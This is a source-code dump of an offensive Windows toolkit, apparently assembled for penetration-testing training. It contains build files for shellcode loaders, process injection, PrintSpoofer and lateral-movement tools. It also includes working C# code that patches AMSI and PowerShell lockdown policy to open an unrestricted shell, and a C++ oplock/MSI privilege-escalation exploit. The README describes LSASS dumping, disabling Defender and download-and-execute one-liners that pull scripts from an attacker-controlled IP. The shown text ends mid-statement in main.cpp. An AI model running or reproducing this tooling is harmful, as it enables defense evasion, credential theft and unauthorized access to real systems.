19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Misc/MiniDump/MiniDump.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD} 8 | Exe 9 | MiniDump 10 | MiniDump 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Misc\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/DLLRunner32_DN2JS.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D8337B89-8E8D-4F3F-9F82-3D1EC83810C1} 8 | Library 9 | Properties 10 | DLLRunner32_DN2JS 11 | DLLRunner32_DN2JS 12 | v4.7.2 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | none 27 | true 28 | payload_dir\x86_64\ 29 | TRACE 30 | prompt 31 | 4 32 | x64 33 | true 34 | 35 | 36 | true 37 | bin\x86\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x86 41 | 7.3 42 | prompt 43 | MinimumRecommendedRules.ruleset 44 | 45 | 46 | payload_dir\ 47 | TRACE 48 | true 49 | true 50 | x86 51 | 7.3 52 | prompt 53 | MinimumRecommendedRules.ruleset 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/exe/exe.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4} 8 | Exe 9 | exe 10 | exe 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/PrintSpoofer.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {C91C8B29-82DF-49C0-986B-81182CF84E42} 8 | Exe 9 | PrintSpoofer 10 | PrintSpoofer 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Privilege_Escalation\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/Builder/Builder.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C} 8 | Exe 9 | Builder 10 | Builder 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Loaders_Disk/clhollow/clhollow.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {9432CB8F-F42F-4588-89B8-B4C48C489BEB} 8 | Exe 9 | clhollow 10 | clhollow 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Loaders_Memory\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Loaders_Disk/clinject/clinject.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {2A515F49-2C07-4747-A5EF-E47516D17C05} 8 | Exe 9 | clinject 10 | clinject 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Loaders_Memory\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Misc/PSLessExec/PSLessExec.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A} 8 | Exe 9 | Fileless_Lateral_Movement 10 | Fileless Lateral Movement 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Misc\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/DLLInject64_DN2JS.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {86D0AA20-3C48-4B18-BD6C-79022279812A} 8 | Library 9 | Properties 10 | DLLInject64_DN2JS 11 | DLLInject64_DN2JS 12 | v4.7.2 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | none 27 | true 28 | payload_dir\x86_64\ 29 | TRACE 30 | prompt 31 | 4 32 | x64 33 | 34 | 35 | true 36 | bin\x64\Debug\ 37 | DEBUG;TRACE 38 | full 39 | x64 40 | 7.3 41 | prompt 42 | MinimumRecommendedRules.ruleset 43 | 44 | 45 | payload_dir\ 46 | TRACE 47 | true 48 | x64 49 | 7.3 50 | prompt 51 | MinimumRecommendedRules.ruleset 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | PreserveNewest 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/src/FileOpLock.cpp: -------------------------------------------------------------------------------- 1 | #include "FileOpLock.h" 2 | #include 3 | 4 | FileOpLock::FileOpLock(UserCallback cb): 5 | g_inputBuffer({ 0 }), g_outputBuffer({ 0 }), g_o({ 0 }), g_hFile(INVALID_HANDLE_VALUE), g_hLockCompleted(nullptr), g_wait(nullptr), _cb(cb) 6 | { 7 | g_inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 8 | g_inputBuffer.StructureLength = sizeof(g_inputBuffer); 9 | g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE; 10 | g_inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST; 11 | g_outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 12 | g_outputBuffer.StructureLength = sizeof(g_outputBuffer); 13 | } 14 | 15 | 16 | FileOpLock::~FileOpLock() 17 | { 18 | if (g_wait) 19 | { 20 | SetThreadpoolWait(g_wait, nullptr, nullptr); 21 | CloseThreadpoolWait(g_wait); 22 | g_wait = nullptr; 23 | } 24 | 25 | if (g_o.hEvent) 26 | { 27 | CloseHandle(g_o.hEvent); 28 | g_o.hEvent = nullptr; 29 | } 30 | 31 | if (g_hFile != INVALID_HANDLE_VALUE) 32 | { 33 | CloseHandle(g_hFile); 34 | g_hFile = INVALID_HANDLE_VALUE; 35 | } 36 | } 37 | 38 | bool FileOpLock::BeginLock(const std::wstring& filename, HANDLE p_provided) 39 | { 40 | g_hLockCompleted = CreateEvent(nullptr, TRUE, FALSE, nullptr); 41 | g_o.hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr); 42 | 43 | 44 | if (p_provided != INVALID_HANDLE_VALUE) 45 | { 46 | g_hFile = p_provided; 47 | } 48 | else 49 | { 50 | g_hFile = CreateFileW(filename.c_str(), GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 51 | 0, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_FLAG_BACKUP_SEMANTICS, 0); 52 | if (g_hFile == INVALID_HANDLE_VALUE) { 53 | 54 | return false; 55 | } 56 | } 57 | 58 | g_wait = CreateThreadpoolWait(WaitCallback, this, nullptr); 59 | if (g_wait == nullptr) 60 | { 61 | 62 | return false; 63 | } 64 | 65 | SetThreadpoolWait(g_wait, g_o.hEvent, nullptr); 66 | 67 | DeviceIoControl(g_hFile, FSCTL_REQUEST_OPLOCK, 68 | &g_inputBuffer, sizeof(g_inputBuffer), 69 | &g_outputBuffer, sizeof(g_outputBuffer), 70 | nullptr, &g_o); 71 | if (GetLastError() != ERROR_IO_PENDING) { 72 | 73 | return false; 74 | } 75 | 76 | return true; 77 | } 78 | 79 | FileOpLock* FileOpLock::CreateLock(const std::wstring& name, FileOpLock::UserCallback cb, HANDLE p_provided) 80 | { 81 | FileOpLock* ret = new FileOpLock(cb); 82 | 83 | if (ret->BeginLock(name, p_provided)) 84 | { 85 | return ret; 86 | } 87 | else 88 | { 89 | delete ret; 90 | return nullptr; 91 | } 92 | } 93 | 94 | void FileOpLock::WaitForLock(UINT Timeout) 95 | { 96 | WaitForSingleObject(g_hLockCompleted, Timeout); 97 | } 98 | 99 | void FileOpLock::WaitCallback(PTP_CALLBACK_INSTANCE Instance, 100 | PVOID Parameter, PTP_WAIT Wait, 101 | TP_WAIT_RESULT WaitResult) 102 | { 103 | UNREFERENCED_PARAMETER(Instance); 104 | UNREFERENCED_PARAMETER(Wait); 105 | UNREFERENCED_PARAMETER(WaitResult); 106 | 107 | FileOpLock* lock = reinterpret_cast(Parameter); 108 | 109 | lock->DoWaitCallback(); 110 | } 111 | 112 | void FileOpLock::DoWaitCallback() 113 | { 114 | DWORD dwBytes; 115 | if (!GetOverlappedResult(g_hFile, &g_o, &dwBytes, TRUE)) { 116 | 117 | } 118 | 119 | if (_cb) 120 | { 121 | _cb(); 122 | } 123 | 124 | 125 | CloseHandle(g_hFile); 126 | g_hFile = INVALID_HANDLE_VALUE; 127 | SetEvent(g_hLockCompleted); 128 | } -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/service.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D614AA1C-E918-43B7-9A76-7EDF6545D530} 8 | WinExe 9 | service 10 | service 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | Component 70 | 71 | 72 | Service1.cs 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | -------------------------------------------------------------------------------- /Active_Directory/sql/.vs/sql/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- 1 | SQLite format 3@ .A  -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- 1 | SQLite format 3@ .A  -------------------------------------------------------------------------------- /Misc/README.md: -------------------------------------------------------------------------------- 1 | # Miscellaneous 2 | 3 | ## ToC 4 | 5 | | Application | Format | Notes | 6 | | ----------- | ------ | ----- | 7 | | `Autos` | PS | Scripts to automate things I found myself doing a lot | 8 | | `AV_Stuff` | PS | Basic scripts for AV/Applocker Enumertion | 9 | | `Fileless_Lateral_Movement` | EXE | PSExec-like tool utilizing remote service configuration for lateral movement | 10 | | `MiniDump` | EXE/PS | A simple binary to Dump LSASS to a file for offline examination | 11 | 12 | 13 | ## `Autos` 14 | Scripts to automate things I found myself doing a lot. 15 | 16 | ### Tools 17 | - `Create-Admin.ps1` 18 | - Create a local Administrator user on the box and enable RDP 19 | - Requires: High Integrity process 20 | - `Compress-ScriptBlock.ps1` 21 | - Minify a Powershell *ScriptBlock*. Pulled from [StartAutomating/PSMinifier](https://github.com/StartAutomating/PSMinifier) 22 | - Usage: 23 | ```ps1 24 | . .\Compress-ScriptBlock.ps1 # import it as a module 25 | $sb=get-command | select -ExpandProperty ScriptBlock # get the scriptblock for your target file 26 | Compress-ScriptBlock -ScriptBlock $sb > 27 | ``` 28 | - Warning: 29 | - Its not perfect, I usually have to do a good amount of manual work 30 | - *Deletes default values for function parameters* 31 | 32 | 33 | ## `AV_Stuff` 34 | Basic scripts for AV and Applocker Enumeration or Disabling that I created with the help of online resources (all credited). 35 | 36 | ### `Disable-AVProduct.ps1` 37 | Get the status of the Antivirus Product on local and Remote Computers, then if Windows Defender is detected locally, disable as much of it as possible. 38 | - Credits: 39 | - `SyncroMSP` at [mspscripts.com](https://mspscripts.com/get-installed-antivirus-information-2/) for `Get-LHSAntiVirusProduct()` 40 | - References: 41 | - [learn.microsoft.com](https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware) 42 | - [jeremybeaume/tools](https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1) 43 | - [viperone.gitbook.io/pentest-everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/defense-evasion/disable-defender) 44 | - Requires: 45 | - Admin privs to disable stuff, enumeration part is fine 46 | - Usage: 47 | ```ps1 48 | powershell.exe -ExecutionPolicy Bypass -c "(new-object system.net.webclient).downloadstring('http://192.168.45.166/Disable-AVProduct.ps1') | IEX;" 49 | ``` 50 | - It doesn't get detected by my version of Defender (v4.18.1807.18075) since its really all semi-normal functionality, but if you have AMSI problems just bypass it first 51 | ```ps1 52 | powershell.exe -ExecutionPolicy Bypass -c "(new-object system.net.webclient).downloadstring('http://192.168.45.166/amsi.txt') | IEX; (new-object system.net.webclient).downloadstring('http://192.168.45.166/Disable-AVProduct.ps1') | IEX;" 53 | ``` 54 | 55 | #### `Disable-AVProduct.min.ps1` 56 | A more concise `Disable-AVProduct.ps1` for active use. Each function is contained entirely on a newline, no comments, etc. Not obfuscated, just smaller (almost half-sized). 57 | 58 | Might have some bugs because of the minifying process. I've tested it a decent amount and it works but if something comes up lmk! 59 | 60 | ### `Get-AppLockerRules.ps1` 61 | 62 | Enumerate Applocker Rules. Very basic, will update in future. 63 | 64 | 65 | ## `PSLessExec` 66 | 67 | Wipes Windows Defender signatures on the *remote host* and uses a `PSExec`-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. 68 | 69 | ### Usage 70 | 71 | ``` 72 | Usage: PSLessExec.exe [Target] [Service] [BinaryToRun] 73 | Example: PSLessExec.exe appsrv01 SensorService notepad.exe 74 | ``` 75 | 76 | ## `MiniDump` 77 | 78 | A simple binary to Dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as a native PowerShell script. 79 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | using System.Runtime.CompilerServices; 4 | using System.Runtime.ExceptionServices; 5 | using System.IO; 6 | 7 | namespace loader 8 | { 9 | 10 | public class MainClass 11 | { 12 | [DllImport("kernel32.dll", SetLastError = true)] 13 | private static extern IntPtr GetStdHandle(int nStdHandle); 14 | [DllImport("kernel32")] 15 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 16 | [DllImport("kernel32")] 17 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 18 | [DllImport("kernel32")] 19 | public static extern IntPtr LoadLibrary(string name); 20 | [DllImport("kernel32.dll")] static extern void Sleep(uint dwMilliseconds); 21 | 22 | [HandleProcessCorruptedStateExceptions] 23 | public static void Main() 24 | { 25 | go(); 26 | } 27 | 28 | [HandleProcessCorruptedStateExceptions] 29 | public static void go() 30 | { 31 | Char a1, a2, a3, a4, a5; 32 | a1 = 'y'; 33 | a2 = 'g'; 34 | a3 = 'u'; 35 | a4 = 'o'; 36 | a5 = 't'; 37 | var Automation = typeof(System.Management.Automation.Alignment).Assembly; 38 | var get_l_info = Automation.GetType("S" + a1 + "stem.Mana" + a2 + "ement.Au" + a5 + "oma" + a5 + "ion.Sec" + a3 + "rity.S"+ a1 + "stemP" + a4 + "licy").GetMethod("GetS" + a1 + "stemL" + a4 + "ckdownP" + a4 + "licy", System.Reflection.BindingFlags.Public | System.Reflection.BindingFlags.Static); 39 | var get_l_handle = get_l_info.MethodHandle; 40 | uint lpflOldProtect; 41 | 42 | RuntimeHelpers.PrepareMethod(get_l_handle); 43 | var get_l_ptr = get_l_handle.GetFunctionPointer(); 44 | 45 | VirtualProtect(get_l_ptr, new UIntPtr(4), 0x40, out lpflOldProtect); 46 | 47 | var new_instr = new byte[] { 0x48, 0x31, 0xc0, 0xc3 }; 48 | 49 | Marshal.Copy(new_instr, 0, get_l_ptr, 4); 50 | string[] filePaths = Directory.GetFiles(@"c:\wind" + a4 + "ws\\s" + a1 + "stem32", "a?s?.d*"); 51 | string libname = (filePaths[0].Substring(filePaths[0].Length - 8)); 52 | try 53 | { 54 | var lib = LoadLibrary(libname); 55 | Char c1, c2, c3, c4, c5, c6, c7, c8; 56 | c1 = 'A'; 57 | c2 = 's'; 58 | c3 = 'c'; 59 | c4 = 'n'; 60 | c5 = 'l'; 61 | c6 = 't'; 62 | c7 = 'z'; 63 | c8 = 'U'; 64 | var baseaddr = GetProcAddress(lib, c1 + "m" + c2 + "i" + c8 + "a" + c3 + "I" + c4 + "i" + c6 + "ia" + c5 + "i" + c7 + "e"); 65 | var funcaddr = baseaddr - 96; 66 | VirtualProtect(funcaddr, new UIntPtr(8), 0x40, out lpflOldProtect); 67 | Marshal.Copy(new byte[] { 0x90, 0xC3 }, 0, funcaddr, 2); 68 | funcaddr = baseaddr - 352; 69 | VirtualProtect(funcaddr, new UIntPtr(8), 0x40, out lpflOldProtect); 70 | Marshal.Copy(new byte[] { 0x90, 0xC3 }, 0, funcaddr, 2); 71 | } 72 | catch 73 | { 74 | Console.WriteLine("Could not patch " + libname + "..."); 75 | } 76 | 77 | 78 | string[] cmd = new string[] { "while ($true){$cmd = Read-Host -Prompt \"PS>\"; if ($cmd -Contains \"exit\") { break} else { iex $cmd; \"`n\"}}" }; 79 | while (true) 80 | { 81 | Microsoft.PowerShell.ConsoleShell.Start(System.Management.Automation.Runspaces.RunspaceConfiguration.Create(), "Banner", "Help", cmd); 82 | break; 83 | } 84 | } 85 | } 86 | 87 | // InstallUtill uninstall bypass 88 | [System.ComponentModel.RunInstaller(true)] 89 | public class Loader : System.Configuration.Install.Installer 90 | { 91 | public override void Uninstall(System.Collections.IDictionary savedState) 92 | { 93 | base.Uninstall(savedState); 94 | MainClass.go(); 95 | } 96 | } 97 | } 98 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {0731542C-42CF-4158-AC29-459EFE42F1B6} 8 | Exe 9 | examine 10 | psbypass 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\AppLocker_Bypass\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | False 58 | ..\..\..\..\..\..\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll 59 | 60 | 61 | 62 | 63 | 64 | False 65 | ..\..\..\..\..\..\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /Active_Directory/sql/sql.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {16665A28-D7AD-45BA-85D0-5F11875AAD0F} 8 | Exe 9 | sql 10 | sql 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Active_Directory\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | true 57 | bin\x86\Debug\ 58 | DEBUG;TRACE 59 | full 60 | x86 61 | 7.3 62 | prompt 63 | true 64 | 65 | 66 | bin\x86\Release\ 67 | TRACE 68 | true 69 | pdbonly 70 | x86 71 | 7.3 72 | prompt 73 | true 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/src/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "popl.hpp" 10 | #include "FileOpLock.h" 11 | #include "exploit.h" 12 | typedef int __missing_type__; 13 | 14 | #if !defined(_COM_SMARTPTR) 15 | #if !defined(_INC_COMIP) 16 | #include 17 | #endif 18 | #define _COM_SMARTPTR _com_ptr_t 19 | #define _COM_SMARTPTR_LEVEL2 _com_IIID 20 | #endif 21 | #if defined(_COM_SMARTPTR) 22 | #if !defined(_COM_SMARTPTR_TYPEDEF) 23 | #if defined(_COM_SMARTPTR_LEVEL2) 24 | #define _COM_SMARTPTR_TYPEDEF(Interface, IID) \ 25 | typedef _COM_SMARTPTR<_COM_SMARTPTR_LEVEL2 > \ 26 | Interface ## Ptr 27 | #else 28 | #define _COM_SMARTPTR_TYPEDEF(Interface, IID) \ 29 | typedef _COM_SMARTPTR \ 30 | Interface ## Ptr 31 | #endif 32 | #endif 33 | #endif 34 | namespace 35 | { 36 | bool install_msi(const std::string& p_msi_path, const std::string& p_install_path) 37 | { 38 | MsiSetInternalUI(INSTALLUILEVEL_NONE, NULL); 39 | 40 | std::string properties("ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR="); 41 | properties.append(p_install_path); 42 | std::cout << "[+] MSI install: " << properties << " " << p_msi_path << std::endl; 43 | int result = MsiInstallProductA(p_msi_path.c_str(), properties.c_str()); 44 | std::cout << "[+] MsiInstallProductA return value: " << result << std::endl; 45 | return (result == 1603); 46 | } 47 | } 48 | class __declspec(uuid("4d40ca7e-d22e-4b06-abbc-4defecf695d8")) IFoo : public IUnknown { 49 | public: 50 | virtual HRESULT __stdcall Method(); 51 | }; 52 | _COM_SMARTPTR_TYPEDEF(IFoo, __uuidof(IFoo)); 53 | 54 | void StartElevationSvc() { 55 | 56 | IFoo* pObject; 57 | struct __declspec(uuid("1FCBE96C-1697-43AF-9140-2897C7C69767")) CLSID_Object; 58 | CoInitialize(NULL); 59 | CoCreateInstance(__uuidof(CLSID_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IFoo), reinterpret_cast(&pObject)); 60 | CoUninitialize(); 61 | return; 62 | } 63 | int main(int p_argc, char* p_argv[]) 64 | { 65 | popl::OptionParser op("Allowed options"); 66 | auto help_option = op.add("h", "help", "produce help message"); 67 | auto msi_path = op.add, popl::Attribute::required>("m", "msi_path", "The path to the MSI to install"); 68 | auto i_path = op.add, popl::Attribute::required>("i", "install_path", "The path to install to"); 69 | auto copy_path = op.add, popl::Attribute::required>("c", "copy_path", "The file to copy to the target path"); 70 | auto target_path = op.add, popl::Attribute::required>("p", "target_path", "The file to create"); 71 | 72 | try 73 | { 74 | op.parse(p_argc, p_argv); 75 | } 76 | catch (std::exception& e) 77 | { 78 | std::cout << e.what() << std::endl; 79 | std::cout << op << std::endl; 80 | return EXIT_FAILURE; 81 | } 82 | 83 | if (help_option->is_set()) 84 | { 85 | std::cout << op << std::endl; 86 | return EXIT_SUCCESS; 87 | } 88 | 89 | std::cout << "[+] User provided MSI path: " << msi_path->value() 